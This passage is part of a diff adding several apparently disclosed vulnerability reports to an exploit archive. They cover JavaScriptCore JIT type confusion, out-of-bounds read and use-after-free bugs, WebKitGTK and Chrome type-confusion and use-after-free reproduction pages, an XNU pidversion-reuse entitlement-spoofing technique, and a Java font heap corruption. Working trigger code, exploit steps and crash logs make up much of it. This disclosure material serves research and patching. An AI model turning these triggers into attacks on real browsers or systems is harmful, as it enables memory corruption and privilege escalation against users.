+// The inferred type for the .groups property will be ObjectWithStructure S3.
+
+// Inferred type for this property will be ObjectWithStructure S7.
+global = a;
+
+// Must assign twice so the JIT uses the inferred type instead of assuming that
+// the property is constant and installing a replacement watchpoint to
+// deoptimize whenever the property is replaced.
+global = a;
+
+// Have a bad time. This will attempt to recreate the global regExpMatchesArrayWithGroupsStructure
+// (to use an array with SlowPutArrayStorage), but since the same structure transitions were
+// performed before, it will actually reuse the existing structure S7. As no property values are
+// assigned, all inferred types for structure S7 will still be valid.
+Object.defineProperty(Array.prototype, 1337, { get() { return 1337; } });
+
+// Compile a function that uses the inferred value of 'global' to omit type checks.
+function hax() {
+    return global.groups.oolProperty1.objProperty.fetchme;
+}
+
+for (let i = 0; i < 10000; i++) {
+    hax(i);
+}
+
+// Create an ObjectWithStructure S7 which violates the inferred type of .groups (and potentially
+// other properties) due to createRegExpMatchesArray using putDirect.
+let match = "hax".match(/(?<oolProperty1>hax)/);
+
+// match.groups has structure S8 and so assignments to it won't invalidate inferred types of S7.
+match.groups.oolProperty1 = objY;       // This property overlaps with oolProperty1 of structure S3.
+
+// The inferred type for 'global' is ObjectWithStructure S4 so watchpoints will not be fired.
+global = match;
+
+// Trigger the type confusion.
+hax();
\ No newline at end of file
diff --git a/exploits/multiple/dos/46648.txt b/exploits/multiple/dos/46648.txt
new file mode 100644
index 000000000..49095bca3
--- /dev/null
+++ b/exploits/multiple/dos/46648.txt
@@ -0,0 +1,51 @@
+Privileged IPC services in userspace often have to verify the security context of their client processes (such as whether the client is sandboxed, has a specific entitlement, or is signed by some code signing authority). This, in turn, requires a way to identify a client process. If PIDs are used for that purpose, the following attack becomes possible:
+
+1. The (unprivileged) client process sends an IPC message to a privileged service
+2. The client process terminates and spawns a privileged process into its PID
+3. The privileged service performs the security check, but since the PID has been reused it performs it on the wrong process
+
+This attack is feasible because the PID space is usually fairly small (e.g. 100000 for XNU) and PIDs can thus be wrapped around relatively quickly (in step 2 or up front). As such, on darwin platforms the recommended way to identify IPC clients for the purpose of performing security checks in userspace is to rely on the audit_token. In contrast to the PID, which wraps around at 100000, the audit_token additionally contains the pidversion, which is in essence a 32-bit PID (from bsd/kern/kern_fork.c):
+
+    proc_t
+    forkproc(proc_t parent_proc)
+    {
+        static int nextpid = 0, pidwrap = 0, nextpidversion = 0;
+        ...;
+
+        /* Repeat until nextpid is a currently unused PID. */
+        nextpid++;
+        ...;
+
+        nprocs++;
+        child_proc->p_pid = nextpid;
+        child_proc->p_responsible_pid = nextpid;
+        child_proc->p_idversion = nextpidversion++;
+        ...;
+
+When using audit_tokens, the previously described attack would now require creating two different processes which have the same pair of (pid, pidversion), which in turn would require spawning roughly 2**32 processes to wrap around the pidversion. However, the pidversion is additionally incremented during execve (from bsd/kern/kern_exec.c):
+
+    /* Update the process' identity version and set the security token */
+    p->p_idversion++;
+
+This is likely done to prevent another attack where a process sends an IPC message, then immediately execve's a privileged binary. The problem here is that the pidversion is incremented "ad-hoc", without updating the global nextpidversion variable. With that it becomes possible to create two processes with the same (pid, pidversion) pair without wrapping around the 32-bit pidversion:
+
+1. The initial exploit process is identified by the pair (pid: X, pidversion: Y)
+2. The exploit performs 10000 execves to get (X, Y + 100000)
+3. The exploit interacts with a privileged service which stores the client's audit_token (or directly uses it, in which case the following part becomes a race)
+4. The exploit forks, with the parent processes immediately terminating, until it has the same PID again. This could, for example, require 99000 forks (because some PIDs are in use). The process now has (X, Y + 99000)
+5. The exploit execves until it has (X, Y + 99999)
+6. The exploit execves a privileged binary. The privileged binary will have (X, Y + 100000)
+7. At this time the privileged service performs a security check of the client but will perform this check on the entitled process even though the request came from an unprivileged process
+
+The attached PoC demonstrates this by showing that an IPC service can be tricked into believing that the client has a specific entitlement. To reproduce:
+
+1. compile the attached code: `make`
+2. start the helper service: `./service`. The service simply prints the value of a predefined entitlement (currently "com.apple.private.AuthorizationServices") of a connected client
+3. in a separate shell start the exploit: `./exploit`.
+4. once the exploit prints "[+] All done. Spawning sudo now", press enter in the shell where the helper service is running. It should now print the value of the entitlement.
+
+The gained primitive (obtaining more or less arbitrary entitlements) can then e.g. be used as described here: https://gist.github.com/ChiChou/e3a50f00853b2fbfb1debad46e501121. Besides entitlements, it should also be possible to spoof code signatures this way. Furthermore, it might be possible to use this bug for a sandbox escape if one is able to somehow perform execve (there are multiple sandboxed services and applications that have (allow process-exec) in their sandbox profile for example). In that case, one could spawn a non-sandboxed system service into the same (pid, pidversion) pair prior to performing some IPC operations where the endpoint will do a sandbox_check_by_audit_token. However, precisely spawning a non-sandboxed process into the same (pid, pidversion) will likely be a lot less reliable.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46648.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/46649.js b/exploits/multiple/dos/46649.js
new file mode 100644
index 000000000..258506427
--- /dev/null
+++ b/exploits/multiple/dos/46649.js
@@ -0,0 +1,77 @@
+/*
+While fuzzing JavaScriptCore, I encountered the following JavaScript program which crashes jsc in current HEAD and release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc on macOS):
+*/
+
+    // Run with --thresholdForFTLOptimizeAfterWarmUp=1000
+
+    // First array probably required to avoid COW backing storage or so...
+    const v3 = [1337,1337,1337,1337];
+    const v6 = [1337,1337];
+
+    function v7(v8) {
+        for (let v9 in v8) {
+            v8.a = 42;
+            const v10 = v8[-698666199];
+        }
+    }
+
+    while (true) {
+        const v14 = v7(v6);
+        const v15 = v7(1337);
+    }
+
+/*
+Note that the sample requires the FTL JIT threshold to be lowered in order to trigger. However, I also have a slightly modified version that (less reliably) crashes with the default threshold which I can share if that is helpful.
+
+Following is my preliminary analysis of the crash.
+
+During JIT compilation in the FTL tier, the JIT IR for v7 will have the following properties:
+
+* A Structure check will be inserted for v8 due to the property access. The check will ensure that the array is of the correct type at runtime (ArrayWithInt32, with a property 'a')
+* The loop header fetches the array length for the enumeration
+* The element access into v8 is (incorrectly?) speculated to be InBounds, presumably because negative numbers are not actually valid array indices but instead regular property names
+* As a result, the element access will be optimized into a CheckBounds node followed by a GetByVal node (both inside the loop body)
+* The CheckBounds node compares the constant index against the array length which was loaded in the loop header
+
+The IR for the function will thus look roughly as follows:
+
+    # Loop header
+    len = LoadArrayLength v8
+    // Do other loop header stuff
+
+    # Loop body
+    CheckStructure v8, expected_structure_id
+    StoreProperty v8, 'a', 42
+    CheckBounds -698666199, len             // Bails out if index is OOB (always in this case...)
+    GetByVal v8, -698666199                 // Loads the element from the backing storage without performing additional checks
+
+    // Jump back to beginning of loop
+
+
+Here is what appears to be happening next during loop-invariant code motion (LICM), an optimization designed to move code inside a loop body in front of the loop if it doesn't need to be executed multiple times:
+
+1. LICM determines that the CheckStructure node can be hoisted in front of the loop header and does so
+2. LICM determines that the CheckBounds node can *not* be hoisted in front of the loop header as it depends on the array length which is only loaded in the loop header
+3. LICM determines that the array access (GetByVal) can be hoisted in front of the loop (as it does not depend on any loop variables) and does so
+
+As a result of the above, the IR is transformed roughly to the following:
+
+    StructureCheck v8, expected_structure_id
+    GetByVal v8, -698666199
+
+    # Loop header
+    len = LoadArrayLength v8
+    // Do other loop header stuff
+
+    # Loop body
+    StoreProperty v8, 'a', 42
+    CheckBounds -698666199, len
+
+    // Jump back to beginning of loop
+
+As such, the (unchecked) array element access is now located before the loop header with the bounds check only happening afterwards inside the loop body. The provided PoC then crashes while accessing memory 698666199 * 8 bytes before the element vector for v6. It should be possible to turn this bug into arbitrary out-of-bounds access, but I haven't tried that.
+
+Hoisting of GetByVal will only happen if safeToExecute (from DFGSafeToExecute.h) returns true. This function appears to only be concerned about type checks, so in this case it concludes that the GetByVal can be moved in front of the loop header as the StructureCheck (performing the type check) is also moved there. This seems to be the reason that the property store (v8.a = 42) is required as it forces a CheckStructure node which would otherwise be missing.
+
+The invocations of v7 with a non-array argument (1337 in this case) seem to be necessary to not trigger a bailout in earlier JIT tiers too often, which would prevent the FTL JIT from ever compiling the function.
+*/
\ No newline at end of file
diff --git a/exploits/multiple/dos/46650.js b/exploits/multiple/dos/46650.js
new file mode 100644
index 000000000..56bacfca1
--- /dev/null
+++ b/exploits/multiple/dos/46650.js
@@ -0,0 +1,96 @@
+/*
+While fuzzing JavaScriptCore, I encountered the following (simplified and commented) JavaScript program which crashes jsc from current HEAD and release:
+*/
+
+    function v9() {
+        // Some watchpoint (on the LexicalEnvironment) is triggered here
+        // during the 2nd invocation which jettisons the CodeBlock for v9.
+
+        // Trigger GC here (in the 2nd invocation) and free the jettisoned CodeBlock.
+        const v18 = [13.37,13.37,13.37,13.37];
+        for (const v43 in v18) {
+            const v47 = new Float64Array(65493);
+        }
+
+        // Trigger some other watchpoint here, jettisoning the same CodeBlock
+        // again and thus crashing when touching the already freed memory.
+        const v66 = RegExp();
+
+        // Seems to be required to get the desired compilation
+        // behaviour in DFG (OSR enter in a loop)...
+        for (let v69 = 0; v69 < 10000; v69++) {
+            function v70() {
+                const v73 = v66.test("asdf");
+            }
+            v70();
+        }
+
+        // Inserts elements into the Array prototype so the
+        // first loop runs longer in the second invocation.
+        for (let v114 = 13.37; v114 < 10000; v114++) {
+            const v127 = [].__proto__;
+            v127[v114] = 1337;
+        }
+    }
+    const v182 = /i/g;
+    const v183 = "ii";
+    v183.replace(v182,v9);
+
+    // (Jettisoning is the process of discarding a unit of JIT compiled code
+    //  because it is no longer needed or is now unsafe to execute).
+
+/*
+When running in a debug build, it produces a crash similar to the following:
+
+* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xbadce8c0)
+    frame #0: 0x000000010066e091 JavaScriptCore`void JSC::VM::logEvent<...>(...) [inlined] std::__1::unique_ptr<...>::operator bool(this=0x00000000badce8c0) const at memory:2583
+(lldb) up 2
+frame #2: 0x000000010066d92e JavaScriptCore`JSC::CodeBlock::jettison(this=0x0000000109388b80, reason=JettisonDueToUnprofiledWatchpoint, mode=CountReoptimization, detail=0x00007ffeefbfc708) at CodeBlock.cpp:1957
+(lldb) x/4gx this
+0x109388b80: 0x0000000000000000 0x00000000badbeef0
+0x109388b90: 0x00000000badbeef0 0x00000000badbeef0
+(lldb) bt
+* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xbadce8c0)
+    frame #0: 0x000000010066e091 JavaScriptCore`void JSC::VM::logEvent<...>(...) [inlined] std::__1::unique_ptr<...>::operator bool(this=0x00000000badce8c0) const at memory:2583
+    frame #1: 0x000000010066e091 JavaScriptCore`void JSC::VM::logEvent<...>(this=0x00000000badbeef0, codeBlock=0x0000000109388b80, summary="jettison", func=0x00007ffeefbfc570)::$_10 const&) at VMInlines.h:59
+  * frame #2: 0x000000010066d92e JavaScriptCore`JSC::CodeBlock::jettison(this=0x0000000109388b80, reason=JettisonDueToUnprofiledWatchpoint, mode=CountReoptimization, detail=0x00007ffeefbfc708) at CodeBlock.cpp:1957
+    frame #3: 0x0000000100674a86 JavaScriptCore`JSC::CodeBlockJettisoningWatchpoint::fireInternal(this=0x0000000106541c08, (null)=0x0000000106600000, detail=0x00007ffeefbfc708) at CodeBlockJettisoningWatchpoint.cpp:40
+    frame #4: 0x000000010072a86c JavaScriptCore`JSC::Watchpoint::fire(this=0x0000000106541c08, vm=0x0000000106600000, detail=0x00007ffeefbfc708) at Watchpoint.cpp:55
+    frame #5: 0x000000010072b014 JavaScriptCore`JSC::WatchpointSet::fireAllWatchpoints(this=0x00000001065bf6e0, vm=0x0000000106600000, detail=0x00007ffeefbfc708) at Watchpoint.cpp:140
+    frame #6: 0x000000010072add6 JavaScriptCore`JSC::WatchpointSet::fireAllSlow(this=0x00000001065bf6e0, vm=0x0000000106600000, detail=0x00007ffeefbfc708) at Watchpoint.cpp:91
+    frame #7: 0x000000010067f790 JavaScriptCore`void JSC::WatchpointSet::fireAll<JSC::FireDetail const>(this=0x00000001065bf6e0, vm=0x0000000106600000, fireDetails=0x00007ffeefbfc708) at Watchpoint.h:190
+    frame #8: 0x000000010072a3bc JavaScriptCore`JSC::WatchpointSet::touch(this=0x00000001065bf6e0, vm=0x0000000106600000, detail=0x00007ffeefbfc708) at Watchpoint.h:198
+    frame #9: 0x0000000100b0a41b JavaScriptCore`JSC::WatchpointSet::touch(this=0x00000001065bf6e0, vm=0x0000000106600000, reason="Executed NotifyWrite") at Watchpoint.h:203
+    frame #10: 0x0000000100b0a3c2 JavaScriptCore`::operationNotifyWrite(exec=0x00007ffeefbfc830, set=0x00000001065bf6e0) at DFGOperations.cpp:2457
+
+As can be seen, the CodeBlock object has been freed by the GC and, since this is a debug build, overwritten with a poison value (0xbadbeef0).
+
+It appears that what is happening here is roughly the following:
+
+* The function v9 is called multiple times as callback during the string.replace operation
+* During the first invocation, the function v9 is JIT compiled at one of the inner loops and execution switches to the JIT code
+    * The JIT compiled code has various dependencies on the outside environment in the form of Watchpoints
+* During the 2nd invocation, the LexicalEnvironment of v9 is recreated, triggering a Watchpoint (presumably because the function was originally compiled at one of the inner loops) and jettisoning the associated CodeBlock
+* At that point, there are no more references to the CodeBlock, and the following GC frees the object
+* Still during the 2nd invocation, after GC, another Watchpoint of the previous JIT code fires, again trying to jettison the CodeBlock that has already been freed
+
+The freeing of the CodeBlock by the GC is possible because the Watchpoint itself only has a raw pointer to the CodeBlock and not any kind of GC reference that would keep it alive (or be set to nullptr):
+
+    class CodeBlockJettisoningWatchpoint : public Watchpoint {
+    public:
+        CodeBlockJettisoningWatchpoint(CodeBlock* codeBlock)
+            : m_codeBlock(codeBlock)
+        {
+        }
+
+    protected:
+        void fireInternal(VM&, const FireDetail&) override;
+
+    private:
+        CodeBlock* m_codeBlock;
+    };
+
+
+It appears that this scenario normally does not happen because the CodeBlock unlinks and frees its associated Watchpoints when it is destroyed.
+However, the reference chain is CodeBlock ---(RefPtr)---> JITCode ---(owning reference)---> Watchpoints, and in this case the JITCode is being kept alive at the entrypoint (CachedCall::call) for the duration of callback, thus keeping the Watchpoints alive as well even though the CodeBlock has already been freed.
+*/
\ No newline at end of file
diff --git a/exploits/multiple/dos/46651.html b/exploits/multiple/dos/46651.html
new file mode 100644
index 000000000..a8f50bb4d
--- /dev/null
+++ b/exploits/multiple/dos/46651.html
@@ -0,0 +1,51 @@
+<!--
+VULNERABILITY DETAILS
+The compositor thread in WebKitGTK+ might alter a FilterOperation object's reference count variable at the same time as the main thread. Then the reference count corruption might lead to a UAF condition.
+
+
+REPRODUCTION CASE
+-->
+
+<html>
+<style>
+@keyframes foo {
+    0% { opacity: 0; }
+    100% { opacity: 1; }
+}
+
+div {
+  animation-name: foo;
+  animation-duration: 1s;
+  animation-iteration-count: infinite;
+  filter: saturate(50%);
+}
+</style>
+<body>
+<script>
+    frame = document.createElement("iframe");
+
+    setInterval(_ => {
+      frame.remove();
+      document.body.appendChild(frame);
+
+      doc = frame.contentDocument;
+      doc.head.appendChild(document.querySelector("style").cloneNode(true));
+
+      elt = document.createElement("div");
+      elt.textContent = "foo";
+      let elements = [];
+
+      for (let i = 0, count = Math.random() * 50; i < count; ++i) {
+        elements[i] = doc.body.appendChild(elt.cloneNode(true));
+        elements[i].clientWidth;
+      }
+    }, Math.random() * 500);
+</script>
+</body>
+</html>
+
+<!--
+VERSION
+Reproduced on WebKitGTK+ build revision 240647.
+This bug doesn't seem to affect WebKit on macOS/iOS.
+-->
\ No newline at end of file
diff --git a/exploits/multiple/dos/46652.txt b/exploits/multiple/dos/46652.txt
new file mode 100644
index 000000000..0c08b58c9
--- /dev/null
+++ b/exploits/multiple/dos/46652.txt
@@ -0,0 +1,93 @@
+VULNERABILITY DETAILS
+The binding code generator doesn't add checks to ensure that the callback
+properties of a dictionary are indeed JS functions. For example, for the
+the TrustedTypePolicyOptions dictionary:
+https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/trustedtypes/trusted_type_policy_options.idl?rcl=6c2e672967359ad32d19af8b09873adab2c0beec&l=7
+-------------------
+dictionary TrustedTypePolicyOptions {
+   CreateHTMLCallback createHTML;
+   CreateScriptCallback createScript;
+   CreateURLCallback createScriptURL;
+   CreateURLCallback createURL;
+   boolean exposed = false;
+};
+
+callback CreateHTMLCallback = DOMString (DOMString input);
+callback CreateScriptCallback = DOMString (DOMString input);
+callback CreateURLCallback = USVString (DOMString input);
+-------------------
+
+the code is generated as follows:
+https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/renderer/bindings/core/v8/v8_trusted_type_policy_options.cc?rcl=077f8deee2dee38d4836be1df20115eba4884f69&l=35
+-------------------
+void V8TrustedTypePolicyOptions::ToImpl(v8::Isolate* isolate, v8::Local<v8::Value> v8_value, TrustedTypePolicyOptions* impl, ExceptionState& exception_state) {
+  if (IsUndefinedOrNull(v8_value)) {
+    return;
+  }
+  if (!v8_value->IsObject()) {
+    exception_state.ThrowTypeError("cannot convert to dictionary.");
+    return;
+  }
+  v8::Local<v8::Object> v8Object = v8_value.As<v8::Object>();
+  ALLOW_UNUSED_LOCAL(v8Object);
+
+  const v8::Eternal<v8::Name>* keys = eternalV8TrustedTypePolicyOptionsKeys(isolate);
+  v8::TryCatch block(isolate);
+  v8::Local<v8::Context> context = isolate->GetCurrentContext();
+  v8::Local<v8::Value> create_html_value;
+  if (!v8Object->Get(context, keys[0].Get(isolate)).ToLocal(&create_html_value)) {
+    exception_state.RethrowV8Exception(block.Exception());
+    return;
+  }
+  if (create_html_value.IsEmpty() || create_html_value->IsUndefined()) {
+    // Do nothing.
+  } else {
+    V8CreateHTMLCallback* create_html_cpp_value = V8CreateHTMLCallback::Create(create_html_value.As<v8::Function>()); //******* cast with no prior check
+    impl->setCreateHTML(create_html_cpp_value);
+  }               
+[...]
+-------------------
+
+Thus, any JS object might be interpreted as a function.
+
+
+VERSION
+Google Chrome 72.0.3626.81 (Official Build) (64-bit) 
+Please note that the TrustedTypes feature is currently hidden behind the
+"experimental platform features" flag.
+
+
+REPRODUCTION CASE
+<script>
+TrustedTypes.createPolicy('foo', { createHTML: 0x41414141 });
+</script>
+
+
+(790.b30): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+chrome_child!v8::internal::JSReceiver::GetCreationContext+0xa:
+00007ffe`ba967f5a 488b41ff        mov     rax,qword ptr [rcx-1] ds:41414140`ffffffff=????????????????
+0:000> r
+rax=00001313b3350115 rbx=00006fc6d6eaf920 rcx=4141414100000000
+rdx=000000e521dfd190 rsi=000000e521dfd190 rdi=000000e521dfd1d8
+rip=00007ffeba967f5a rsp=000000e521dfd130 rbp=000000e521dfd290
+ r8=00007ffebfb25930  r9=0000000000000018 r10=0000000000000005
+r11=00003f2bc628c240 r12=000000e521dfd330 r13=000001e7dbd16650
+r14=000001e7ddc22a90 r15=00003f2bc62364b8
+iopl=0         nv up ei pl nz na po nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
+chrome_child!v8::internal::JSReceiver::GetCreationContext+0xa:
+00007ffe`ba967f5a 488b41ff        mov     rax,qword ptr [rcx-1] ds:41414140`ffffffff=????????????????
+0:000> k
+ # Child-SP          RetAddr           Call Site
+00 000000e5`21dfd130 00007ffe`ba967f24 chrome_child!v8::internal::JSReceiver::GetCreationContext+0xa [C:\b\c\b\win64_clang\src\v8\src\objects.cc @ 4010] 
+01 000000e5`21dfd170 00007ffe`bab1a1d7 chrome_child!v8::Object::CreationContext+0x24 [C:\b\c\b\win64_clang\src\v8\src\api.cc @ 4859] 
+02 000000e5`21dfd1b0 00007ffe`bd196835 chrome_child!blink::CallbackFunctionBase::CallbackFunctionBase+0x47 [C:\b\c\b\win64_clang\src\third_party\blink\renderer\platform\bindings\callback_function_base.cc @ 13] 
+03 000000e5`21dfd210 00007ffe`bd195101 chrome_child!blink::V8TrustedTypePolicyOptions::ToImpl+0x125 [C:\b\c\b\win64_clang\src\out\Release_x64\gen\third_party\blink\renderer\bindings\core\v8\v8_trusted_type_policy_options.cc @ 57] 
+04 000000e5`21dfd2f0 00007ffe`ba957f93 chrome_child!blink::V8TrustedTypePolicyFactory::CreatePolicyMethodCallback+0x211 [C:\b\c\b\win64_clang\src\out\Release_x64\gen\third_party\blink\renderer\bindings\core\v8\v8_trusted_type_policy_factory.cc @ 234] 
+05 000000e5`21dfd3c0 00007ffe`bbbebb9f chrome_child!v8::internal::FunctionCallbackArguments::Call+0x253 [C:\b\c\b\win64_clang\src\v8\src\api-arguments-inl.h @ 147] 
+06 000000e5`21dfd4e0 00007ffe`bbbeb631 chrome_child!v8::internal::`anonymous namespace'::HandleApiCallHelper<0>+0x20f [C:\b\c\b\win64_clang\src\v8\src\builtins\builtins-api.cc @ 111] 
+07 000000e5`21dfd5e0 00007ffe`ba957ca1 chrome_child!v8::internal::Builtin_Impl_HandleApiCall+0x111 [C:\b\c\b\win64_clang\src\v8\src\builtins\builtins-api.cc @ 0] 
+08 000000e5`21dfd6a0 00007ffe`bc23cdcf chrome_child!v8::internal::Builtin_HandleApiCall+0x41 [C:\b\c\b\win64_clang\src\v8\src\builtins\builtins-api.cc @ 127] 
+09 000000e5`21dfd700 00003921`bff1b0d1 chrome_child!Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_NoBuiltinExit+0x4f
\ No newline at end of file
diff --git a/exploits/multiple/dos/46653.html b/exploits/multiple/dos/46653.html
new file mode 100644
index 000000000..4bf594141
--- /dev/null
+++ b/exploits/multiple/dos/46653.html
@@ -0,0 +1,138 @@
+<!--
+VULNERABILITY DETAILS
+https://cs.chromium.org/chromium/src/third_party/blink/renderer/bindings/core/v8/initialize_v8_extras_binding.cc?rcl=b16591511b299e0791def0b85dced2c74efc4961&l=90
+void AddOriginals(ScriptState* script_state, v8::Local<v8::Object> binding) {
+  // These values are only used when serialization is enabled.
+  if (!RuntimeEnabledFeatures::TransferableStreamsEnabled())
+    return;
+
+  v8::Local<v8::Object> global = script_state->GetContext()->Global();
+  v8::Local<v8::Context> context = script_state->GetContext();
+  v8::Isolate* isolate = script_state->GetIsolate();
+
+  const auto ObjectGet = [&context, &isolate](v8::Local<v8::Value> object,
+                                              const char* property) {
+    DCHECK(object->IsObject());
+    return object.As<v8::Object>()
+        ->Get(context, V8AtomicString(isolate, property))
+        .ToLocalChecked();
+  };
+
+[...]
+
+  v8::Local<v8::Value> message_port = ObjectGet(global, "MessagePort");
+  v8::Local<v8::Value> dom_exception = ObjectGet(global, "DOMException");
+
+  // Most Worklets don't have MessagePort. In this case, serialization will
+  // fail. AudioWorklet has MessagePort but no DOMException, so it can't use
+  // serialization for now.
+  if (message_port->IsUndefined() || dom_exception->IsUndefined()) // ***1***
+    return;
+
+  v8::Local<v8::Value> event_target_prototype =
+      GetPrototype(ObjectGet(global, "EventTarget"));
+  Bind("EventTarget_addEventListener",
+       ObjectGet(event_target_prototype, "addEventListener"));
+
+  v8::Local<v8::Value> message_port_prototype = GetPrototype(message_port);
+  Bind("MessagePort_postMessage",
+       ObjectGet(message_port_prototype, "postMessage"));
+[...]
+
+https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/streams/ReadableStream.js?rcl=b16591511b299e0791def0b85dced2c74efc4961&l=1044
+  function ReadableStreamSerialize(readable, port) {
+    // assert(IsReadableStream(readable),
+    //        `! IsReadableStream(_readable_) is true`);
+    if (IsReadableStreamLocked(readable)) {
+      throw new TypeError(streamErrors.cannotTransferLockedStream);
+    }
+
+    if (!binding.MessagePort_postMessage) { // ***2***
+      throw new TypeError(streamErrors.cannotTransferContext);
+    }
+
+    const writable = CreateCrossRealmTransformWritable(port);
+    const promise =
+          ReadableStreamPipeTo(readable, writable, false, false, false);
+    markPromiseAsHandled(promise);
+  }
+
+A worklet's context might not have the objects required to implement ReadableStream serialization.
+In that case, |AddOriginals| would exit early leaving the |binding| object partially initialized[1].
+|ReadableStreamSerialize| checks if the "MessagePort_postMessage" property exists on the |binding|
+object to determine whether serialization is possible[2]. The problem is that the check would be
+observable to a getter defined on |Object.prototype|, which could leak the value of |binding|.
+
+
+VERSION
+Google Chrome 73.0.3683.39 (Official Build) beta (64-bit) (cohort: Beta)
+Chromium 74.0.3712.0 (Developer Build) (64-bit)
+
+Also, please note that the "stream serialization" feature is currently hidden behind the
+"experimental platform features" flag.
+
+
+REPRODUCTION CASE
+The repro case uses the leaked |binding| object to redefine an internal method and trigger a type
+confusion.
+-->
+
+<body>
+<h1>Click to start AudioContext</h1>
+<script>
+function runInWorket() {
+  function leakBinding(port) {
+    let stream = new ReadableStream;
+    let binding;
+    Object.prototype.__defineGetter__("MessagePort_postMessage", function() {
+      binding = this;
+    });
+    try {
+      port.postMessage(stream, [stream]);
+    } catch (e) {}
+    delete Object.prototype.MessagePort_postMessage;
+    return binding;
+  }
+
+  function triggerTypeConfusion(binding) {
+    console.log(Object.keys(binding));
+
+    binding.ReadableStreamTee = function() {
+      return 0x4142;
+    }
+    let stream = new ReadableStream;
+    stream.tee();
+  }
+
+  class MyWorkletProcessor extends AudioWorkletProcessor {
+    constructor() {
+      super();
+
+      triggerTypeConfusion(leakBinding(this.port));
+    }
+
+    process() {}
+  }
+
+  registerProcessor("my-worklet-processor", MyWorkletProcessor);
+}
+let blob = new Blob([`(${runInWorket}())`], {type: "text/javascript"});
+let url = URL.createObjectURL(blob);
+
+window.onclick = () => {
+  window.onclick = null;
+
+  class MyWorkletNode extends AudioWorkletNode {
+    constructor(context) {
+      super(context, "my-worklet-processor");
+    }
+  }
+
+  let context = new AudioContext();
+
+  context.audioWorklet.addModule(url).then(() => {
+    let node = new MyWorkletNode(context);
+  });
+}
+</script>
+</body>
\ No newline at end of file
diff --git a/exploits/multiple/dos/46722.txt b/exploits/multiple/dos/46722.txt
new file mode 100644
index 000000000..32bb41438
--- /dev/null
+++ b/exploits/multiple/dos/46722.txt
@@ -0,0 +1,99 @@
+A heap corruption was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType, implemented in a proprietary t2k library. It manifests itself in the form of the following (or similar) crash:
+
+--- cut ---
+  $ bin/java -cp . DisplaySfntFont test.ttf
+  Iteration (0,0)
+  *** Error in `bin/java': munmap_chunk(): invalid pointer: 0x00007f5cf82a6490 ***
+  ======= Backtrace: =========
+  /lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f5cfd492bcb]
+  /lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f5cfd498f96]
+  jre/8u202/lib/amd64/libt2k.so(+0x5443d)[0x7f5cd563343d]
+  jre/8u202/lib/amd64/libt2k.so(+0x47b95)[0x7f5cd5626b95]
+  jre/8u202/lib/amd64/libt2k.so(Java_sun_font_T2KFontScaler_getGlyphImageNative+0xe5)[0x7f5cd560fa25]
+  [0x7f5ce83a06c7]
+  ======= Memory map: ========
+  00400000-00401000 r-xp 00000000 fe:01 20840680                           jre/8u202/bin/java
+  00600000-00601000 r--p 00000000 fe:01 20840680                           jre/8u202/bin/java
+  00601000-00602000 rw-p 00001000 fe:01 20840680                           jre/8u202/bin/java
+  02573000-02594000 rw-p 00000000 00:00 0                                  [heap]
+  3d1a00000-3fba00000 rw-p 00000000 00:00 0
+  3fba00000-670900000 ---p 00000000 00:00 0
+  670900000-685900000 rw-p 00000000 00:00 0
+  685900000-7c0000000 ---p 00000000 00:00 0
+  7c0000000-7c00c0000 rw-p 00000000 00:00 0
+  7c00c0000-800000000 ---p 00000000 00:00 0
+  [...]
+  Aborted
+--- cut ---
+
+The crash reproduces on both Windows and Linux platforms. On Linux, it can be also triggered under Valgrind (many out-of-bounds reads and writes in sc_FindExtrema4 were ommitted in the log below):
+
+--- cut ---
+  $ valgrind bin/java -cp . DisplaySfntFont test.ttf
+  [...]
+  ==211051== Invalid write of size 8
+  ==211051==    at 0x415B30EE: sc_FindExtrema4 (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x4159A402: fs_FindBitMapSize4 (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415D3247: MakeBWBits (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415CAE44: T2K_RenderGlyphInternal (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415CB3CA: T2K_RenderGlyph (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415B4A24: Java_sun_font_T2KFontScaler_getGlyphImageNative (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x7B8D6C6: ???
+  ==211051==    by 0x7B7CDCF: ???
+  ==211051==    by 0x7B7CDCF: ???
+  ==211051==    by 0x7B7CDCF: ???
+  ==211051==    by 0x7B7D2BC: ???
+  ==211051==    by 0x7B7CA8F: ???
+  ==211051==  Address 0x3f6f1d38 is 19,160 bytes inside a block of size 19,166 alloc'd
+  ==211051==    at 0x4C2BBEF: malloc (vg_replace_malloc.c:299)
+  ==211051==    by 0x415D84A4: tsi_AllocMem (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415B2664: sc_FindExtrema4 (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x4159A402: fs_FindBitMapSize4 (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415D3247: MakeBWBits (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415CAE44: T2K_RenderGlyphInternal (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415CB3CA: T2K_RenderGlyph (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x415B4A24: Java_sun_font_T2KFontScaler_getGlyphImageNative (in jre/8u202/lib/amd64/libt2k.so)
+  ==211051==    by 0x7B8D6C6: ???
+  ==211051==    by 0x7B7CDCF: ???
+  ==211051==    by 0x7B7CDCF: ???
